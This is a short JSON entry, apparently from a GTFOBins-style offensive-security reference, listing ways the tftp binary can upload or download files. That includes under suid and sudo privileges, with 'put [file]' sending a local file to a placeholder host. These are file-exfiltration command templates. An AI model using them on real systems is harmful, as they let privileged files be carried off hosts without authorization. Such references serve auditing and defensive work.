You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

28 lines
616 B
JSON

{
"functions": {
"file-upload": [
{
"description": "Send local file to a TFTP server.",
"code": "tftp [host]\nput [file]\n"
}
],
"file-download": [
{
"description": "Fetch a remote file from a TFTP server.",
"code": "tftp [host]\nget [file]\n"
}
],
"suid": [
{
"description": "Send local file to a TFTP server.",
"code": "./tftp [host]\nput [file]\n"
}
],
"sudo": [
{
"description": "Send local file to a TFTP server.",
"code": "sudo tftp [host]\nput [file]\n"
}
]
}
}